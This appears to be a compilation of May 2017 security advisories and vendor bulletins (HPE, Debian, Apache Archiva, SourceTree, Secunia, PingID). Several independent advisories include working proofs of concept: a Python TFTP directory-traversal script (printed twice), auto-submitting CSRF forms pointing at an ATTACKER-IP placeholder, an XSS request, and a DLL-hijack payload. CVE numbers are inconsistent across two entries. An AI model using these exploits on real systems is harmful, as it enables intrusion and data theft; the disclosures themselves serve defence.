[security bulletin] HPESBGN03748 rev.1 - HPE Cloud Optimizer, Remote Disclosure of Information

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03748en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbgn03748en_us
Version: 1

HPESBGN03748 rev.1 - HPE Cloud Optimizer, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2017-05-18
Last Updated: 2017-05-18

Potential Security Impact: Remote: Disclosure of Information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HPE Cloud
Optimizer. The vulnerability could be remotely exploited resulting in
disclosure of information.

References:

  - CVE-2017-8944 - remote disclosure of information

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Cloud Optimizer v3.0x

BACKGROUND

  CVSS Base Metrics
  =================
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

    CVE-2017-8944
      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
      7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)

    Information on CVSS is documented in
    HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

Hewlett Packard Company thanks rgod working with Trend Micro's Zero Day
Initiative for reporting this issue to security-alert@hpe.com

RESOLUTION

HPE has made the following software updates and mitigation information
available to resolve the vulnerability in the impacted versions of HPE Cloud
Optimizer.

Please upgrade to Cloud Optimizer v3.01 and then install to latest patch
using the links below:

* For Installer:
<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets
arch/document/LID/VPVINSTALLER_00007>

* Using Specified Repository (using .zip) for Virtual Appliance:
<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets
arch/document/LID/VPVZIP_00007>

* Using CD-ROM Updates (using .iso) for Virtual Appliance:
<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets
arch/document/LID/VPVISO_00006>

*Note:* For versions prior to v3.01, please first upgrade to v3.01 as
mentioned in the Chapter 4 of the product installation guide - "Upgrading
Earlier Versions to HPE Cloud Optimizer 3.01".

HISTORY
Version:1 (rev.1) - 18 May 2017 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

PingID (MFA) - Reflected Cross-Site Scripting

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  PingID (MFA) [1]
# Vendor:   Ping Identity Corporation
# CSNC ID:  CSNC-2017-013
# Subject:   Reflected Cross-Site Scripting
# Risk:        High
# Effect:     Remotely exploitable
# Author:   Stephan Sekula <stephan.sekula@compass-security.com>
# Date:      18.04.2017
#
#############################################################

Introduction:
-------------
With PingID MFA, you can easily control when your users need to authenticate with a
second factor. You can configure your policies based upon the following:
    Group - Require MFA for members of a specific group.
    Application - Require MFA for specific applications.
    Geofence - Require MFA if the user is outside a pre-set geofence.
    Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken.
    Network IP - Require MFA if the device isn't in a specific IP range.
PingID MFA delivers the granular security that your policies require with the ease
of use your users want. [1]

Compass Security discovered a web application security flaw in PingID's authentication
process, which allows an attacker to manipulate the resulting website. This allows,
for instance, attacking the user's browser or redirecting the user to a phishing website.


Technical Description
---------------------
During the authentication process, a message parameter is used, which can
be manipulated. If this parameter contains JavaScript code, it is executed
in the user's browser. Exploiting the vulnerability will lead to so-called
Cross-Site Scripting (XSS), allowing the execution of JavaScript in the
context of the victim.

Request:
POST /pingid/ppm/auth/otp HTTP/1.1
Host: authenticator.pingone.com
[CUT]
Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

otp=123456&message=<script>alert(0)</script>

Response:
HTTP/1.1 200 OK
Date: Thu, 13 Apr 2017 11:21:45 GMT
Server:
Cache-Control: no-cache, no-store
[CUT]
Connection: close
X-Content-Type-Options: nosniff
Content-Length: 8313

<!DOCTYPE html>
<html>
<head>
    [CUT]
</head>
<body>
[CUT]
    <div class="admin-message"><script>alert(0)</script></div>
[CUT]
</body>
</html>


Workaround / Fix:
-----------------
The vendor has addressed the vulnerability. In general, this issue can be fixed by
properly encoding all output, which is posted back to the user.
For instance, using HTML encoding, to convert < to &lt; and > to &gt;.


Timeline:
---------
2017-05-16:     Coordinated public disclosure date
2017-05-03:     Release of fixed version/patch
2017-04-20:     Initial vendor response
2017-04-19:     Initial vendor notification
2017-04-13:     Discovery by Stephan Sekula


References:
-----------
[1] https://www.pingidentity.com/en/products/pingid.html

[SECURITY] [DSA 3856-1] deluge security update

- -------------------------------------------------------------------------
Debian Security Advisory DSA-3856-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
May 18, 2017                          https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : deluge
CVE ID         : CVE-2017-7178 CVE-2017-9031

Two vulnerabilities have been discovered in the web interface of the
Deluge BitTorrent client (directory traversal and cross-site request
forgery).

For the stable distribution (jessie), these problems have been fixed in
version 1.3.10-3+deb8u1.

For the unstable distribution (sid), these problems have been fixed in
version 1.3.13+git20161130.48cedf63-3.

We recommend that you upgrade your deluge packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

[SECURITY] CVE-2017-5657: Apache Archiva CSRF vulnerability for REST endpoints

CVE-2017-5657: Apache Archiva CSRF vulnerabilities for various REST endpoints

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
    Archiva 2.0.0 - 2.2.1
    The unsupported versions 1.x are also affected.

Several REST service endpoints of Apache Archiva are not protected against
Cross Site Request Forgery (CSRF) attacks. A malicious site opened in the same
browser as the archiva site, may send HTML response that performs arbitrary
actions on archiva services, with the same rights as the active archiva
session (e.g. adminstrator rights).

Mitigation:
  All users are recommended to upgrade to Archiva 2.2.3 or higher,
  where additional measures are taken to verify the origin of REST requests.

References:
http://archiva.apache.org/security.html#CVE-2017-5657

The newest Archiva version can be downloaded from:
http://archiva.apache.org/download.cgi

[SECURITY] [DSA 3858-1] openjdk-7 security update

Debian Security Advisory DSA-3858-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
May 19, 2017                          https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openjdk-7
CVE ID         : CVE-2017-3509 CVE-2017-3511 CVE-2017-3526 CVE-2017-3533
                 CVE-2017-3539 CVE-2017-3544

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform, resulting in privilege
escalation, denial of service, newline injection in SMTP or use of
insecure cryptography.

For the stable distribution (jessie), these problems have been fixed in
version 7u131-2.6.9-2~deb8u1.

We recommend that you upgrade your openjdk-7 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec



Vendor:
====================
www.secure-bytes.com



Product:
=====================
Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.



Vulnerability Type:
===================
Directory Traversal



CVE Reference:
==============
CVE-2017-9024



Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.




Exploit/POC:
=============
import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"                #TFTP Read
PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"           #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
==================================
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

May 2017 - SourceTree - Critical Security Advisory

This email refers to the advisory found at
https://confluence.atlassian.com/x/jW2xNQ .


CVE ID:

* CVE-2017-8768.

Product: SourceTree.

Affected SourceTree product versions:

* SourceTree for Mac 1.4.0 <= version < 2.5.1
* SourceTree for Windows 0.8.4b <= version < 2.0.20.1


Fixed SourceTree product versions:

* Versions of SourceTree for Mac equal to and above 2.5.1 contain a
fix for this issue.
* Versions of SourceTree for Windows equal to and above 2.0.20.1
contain a fix for this issue.

Summary:
This advisory discloses a critical security vulnerability in versions
of SourceTree for Mac starting with 1.4.0 but before 2.5.1 and
SourceTree for Windows starting with 0.8.4b but before 2.0.20.1.

Customers who have upgraded SourceTree for Mac to version 2.5.1 are
not affected.

Customers who have upgraded SourceTree for Windows to version 2.0.20.1
are not affected.

Customers who have downloaded and installed SourceTree for Mac
starting with 1.4.0 but before 2.5.1 (the fixed version for 2.5.x) or
who have downloaded and installed SourceTree for Windows starting with
0.8.4b but before 2.0.20.1 (the fixed version for 2.0.x) please
upgrade SourceTree to the latest version to fix this vulnerability.
Command Injection - CVE-2017-8768:

Severity:
Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels. The
scale allows us to rank the severity as critical, high, moderate or
low.
This is our assessment and you should evaluate its applicability to
your own IT environment.


Description:

SourceTree for Mac and Windows are affected by a command injection
vulnerability in URI handling. The vulnerability can be triggered
through a browser or the SourceTree interface.
Versions of SourceTree for Mac starting with 1.4.0 but before 2.5.1
and versions of SourceTree for Windows starting with 0.8.4b but before
2.0.20.1 are affected by this vulnerability. The issue for SourceTree
for Mac can found at https://jira.atlassian.com/browse/SRCTREE-4738
and for SourceTree for Windows at
https://jira.atlassian.com/browse/SRCTREEWIN-7161 .

Remediation:

Upgrade SourceTree for Mac to version 2.5.1 or higher. Please note
that since SourceTree for Mac 2.5.0 Mac OSX 10.11 or later is
required.
Upgrade SourceTree for Windows to version 2.0.20.1 or higher.

For a full description of the latest version of SourceTree, see the
release notes for Mac
(https://www.sourcetreeapp.com/update/releasenotes/2.5.1.html) and for
Windows (https://www.sourcetreeapp.com/update/windows/ga/ReleaseNotes_2.0.20.1.html).
You can download the latest version of SourceTree from
https://www.sourcetreeapp.com/.


Acknowledgements:
Atlassian would like to credit Yu Hong for reporting this issue to us.


Support:
If you have questions or concerns regarding this advisory, please
raise a support request at https://support.atlassian.com/.

CVE-2017-9046 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection

[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec



Vendor:
================
www.mantisbt.org



Product:
=========
Mantis Bug Tracker
1.3.10 / v2.3.0


MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.



Vulnerability Type:
========================
CSRF Permalink Injection



CVE Reference:
==============
CVE-2017-7620



Security Issue:
================
Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.

Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.
Line: 270

# Check for URL's pointing to other domains

if( 0 == $t_type || empty( $t_matches['script'] ) ||

    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {



    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';

}



# Start extracting regex matches

$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];




Exploit/POC:
=============
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
<script>document.forms[0].submit()</script>
</form>

OR

<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
<script>document.forms[0].submit()</script>
</form>



Network Access:
===============
Remote




Severity:
=========
Medium



Disclosure Timeline:
=============================
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC



Vendor:
=============
www.pmail.com



Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.



Vulnerability Type:
======================
Remote Code Execution




CVE Reference:
==============
CVE-2017-9046



Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser.

e.g.

<a href="mailto:name@victim.com">Link text</a>

Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the  mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.

User needs to have setup PMAIL with "mailto:" link option on install.


Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:" link option on install.


2) Compile "ssgp.dll" as DLL using below 'C' code.

#include<windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
    break;
  }

return 0;
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
<a href="mailto:name@victim.com">Pegasus Exploit POC</a>


5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.


Our code gets executed...



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=====================================
Vendor Notification:  October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec



Vendor:
====================
www.secure-bytes.com



Product:
=====================
Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.



Vulnerability Type:
===================
Directory Traversal



CVE Reference:
==============
CVE-2017-9024



Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.




Exploit/POC:
=============
import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"                #TFTP Read
PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"           #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
==================================
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

HPESBHF03744 rev.1 - HPE Intelligent Management Center (iMC) PLAT running OpenSSL, Remote Denial of Service (DoS)

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03744en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03744en_us
Version: 1

HPESBHF03744 rev.1 - HPE Intelligent Management Center (iMC) PLAT running OpenSSL, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2017-05-12
Last Updated: 2017-05-12

Potential Security Impact: Remote: Denial of Service (DoS)

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities with OpenSSL have been addressed for HPE Intelligent Management Center (iMC) PLAT. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS).

References:

  - CVE-2016-7053 - Remote Denial of Service (DoS)
  - CVE-2016-7054 - Remote Denial of Service (DoS)
  - CVE-2016-7055 - Remote Denial of Service (DoS)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HP Intelligent Management Center (iMC) All versions prior to IMC PLAT 7.3
E0504P04 - Please refer to the RESOLUTION below for a list of impacted products.

BACKGROUND

  CVSS Base Metrics
  =================
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

    CVE-2016-7053
      3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
      4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

    CVE-2016-7054
      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
      5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

    CVE-2016-7055
      3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
      2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)

    Information on CVSS is documented in
    HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following software update available to resolve the vulnerability in the iMC PLAT network products listed.

  + **iMC PLAT - Version: Fixed in IMC PLAT 7.3 E0504P04**
    * HP Network Products
      - JD125A  HP IMC Std S/W Platform w/100-node
      - JD126A  HP IMC Ent S/W Platform w/100-node
      - JD808A  HP IMC Ent Platform w/100-node License
      - JD814A   HP A-IMC Enterprise Edition Software DVD Media
      - JD815A  HP IMC Std Platform w/100-node License
      - JD816A  HP A-IMC Standard Edition Software DVD Media
      - JF288AAE  HP Network Director to Intelligent Management Center Upgrade E-LTU
      - JF289AAE  HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
      - JF377A  HP IMC Std S/W Platform w/100-node Lic
      - JF377AAE  HP IMC Std S/W Pltfrm w/100-node E-LTU
      - JF378A  HP IMC Ent S/W Platform w/200-node Lic
      - JF378AAE  HP IMC Ent S/W Pltfrm w/200-node E-LTU
      - JG546AAE  HP IMC Basic SW Platform w/50-node E-LTU
      - JG548AAE  HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
      - JG549AAE  HP PCM+ to IMC Std Upgr w/200-node E-LTU
      - JG747AAE  HP IMC Std SW Plat w/ 50 Nodes E-LTU
      - JG748AAE  HP IMC Ent SW Plat w/ 50 Nodes E-LTU
      - JG768AAE  HP PCM+ to IMC Std Upg w/ 200-node E-LTU
      - JG550AAE HPE PCM+ Mobility Manager to IMC Basic WLAN Platform Upgrade 50-node and 150-AP E-LTU
      - JG590AAE HPE IMC Basic WLAN Manager Software Platform 50 Access Point E-LTU
      - JG660AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
      - JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU
      - JG767AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
      - JG768AAE HPE PCM+ to IMC Standard Software Platform Upgrade with 200-node E-LTU



**Note:** Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY
Version:1 (rev.1) - 11 May 2017 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

Secunia Research: Microsoft Windows Heap-based Buffer Overflow Vulnerabilities

======================================================================

                     Secunia Research 2016/05/22

    Microsoft Windows Heap-based Buffer Overflow Vulnerabilities

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerabilities.......................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Flexera Software...............................................8
Verification.........................................................9

======================================================================
1) Affected Software

* Microsoft Windows 10
* Microsoft Windows 7
* Microsoft Windows 8.1
* Microsoft Windows RT 8.1
* Microsoft Windows Server 2008
* Microsoft Windows Server 2012
* Microsoft Windows Server 2016
* Microsoft Windows Vista

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  From remote

======================================================================
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in Microsoft
Windows, which can be exploited by malicious people to compromise a
vulnerable system.

1) An error within the "LoadUvsTable()" function can be exploited to
cause a heap-based buffer overflow via a font file containing
specially crafted Unicode Variation Sequences tables.

2) An integer overflow error within the "LoadFont()" function can be
exploited to cause a heap-based buffer overflow via a font file
containing specially crafted Unicode Variation Sequences tables.

Successful exploitation of the vulnerabilities allows execution of
arbitrary code.

The vulnerabilities are confirmed on a fully patched Windows 10
Professional (gdi32full.dll version 10.0.14393.576) and Windows 7
Professional (usp10.dll version 1.626.7601.23585). Other versions
may also be affected.

======================================================================
4) Solution

Apply update.
https://technet.microsoft.com/library/security/MS17-013

======================================================================
5) Time Table

2016/12/13 - Notified vendor about an incomplete fix of CVE-2016-7274.
2016/12/14 - Release of Secunia Advisory SA74000 due to details
             implicitly being public.
2016/12/15 - Update of SA74000 with a further vulnerability.
2016/12/29 - Vendor communication regarding root cause analysis.
2017/01/25 - Vendor patch scheduled for February 2017.
2017/02/14 - Vendor announces delay of February 2017 patch releases.
2017/03/06 - Vendor patch scheduled for March 2017.
2017/03/14 - Updated Secunia Advisory SA74000 due to release
             of vendor patch.
2017/05/22 - Public disclosure of Secunia Research Advisory.

======================================================================
6) Credits

Discovered by Hossein Lotfi, Secunia Research at Flexera Software.

======================================================================
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-0014 identifier for the vulnerabilities.

======================================================================
8) About Flexera Software

Flexera Software helps application producers and enterprises increase
application usage and the value they derive from their software.


http://www.flexerasoftware.com/enterprise/company/about/

Flexera Software  delivers  market-leading  Software  Vulnerability
Management solutions enabling enterprises to proactively identify and
remediate software Vulnerability, effectively reducing the risk of
costly security breaches.

http://www.flexerasoftware.com/enterprise/products/

Flexera  Software  supports  and  contributes  to  the community in
several ways.  We have always believed that reliable vulnerability
intelligence and tools to aid identifying and fixing Vulnerability
should be  freely available  for  consumers  to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address Vulnerability in a proper way and help
users get updated  and  stay secure.  End-users (whether private
individuals or businesses) are otherwise left largely alone,  and
that is why back in 2002, Secunia Research started investigating,
coordinating  disclosure  and  verifying software Vulnerability.
In  2016,  Secunia Research  became  a  part  of  Flexera Software
and today our in-house software vulnerability research remains the
core  of  the  Software  Vulnerability  Management  products  at
Flexera Software.

https://secuniaresearch.flexerasoftware.com/secunia_research/

The  public  Advisory database  contains sufficient information  for
researchers, security enthusiasts, and consumers to lookup individual
products and Vulnerability  and  assess, whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered

https://secuniaresearch.flexerasoftware.com/advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2017-9/

Complete list of vulnerability reports published by Secunia Research:
https://secuniaresearch.flexerasoftware.com/secunia_research/

Secunia Research Blog at Flexera Software:
http://blogs.flexerasoftware.com/secunia-research/2016/12/microsoft_
windows_loaduvstable_heap_based_buffer_overflow_vulnerability.html

======================================================================

[SECURITY] [DSA 3861-1] libtasn1-6 security update

Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-3861-1                   security@debian.org
https://www.debian.org/security/                       Sebastien Delafond
May 24, 2017                          https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : libtasn1-6
CVE ID         : CVE-2017-6891
Debian Bug     : 863186

Jakub Jirasek of Secunia Research discovered that libtasn1, a library
used to handle Abstract Syntax Notation One structures, did not
properly validate its input. This would allow an attacker to cause a
crash by denial-of-service, or potentially execute arbitrary code, by
tricking a user into processing a maliciously crafted assignments
file.

For the stable distribution (jessie), this problem has been fixed in
version 4.2-3+deb8u3.

We recommend that you upgrade your libtasn1-6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

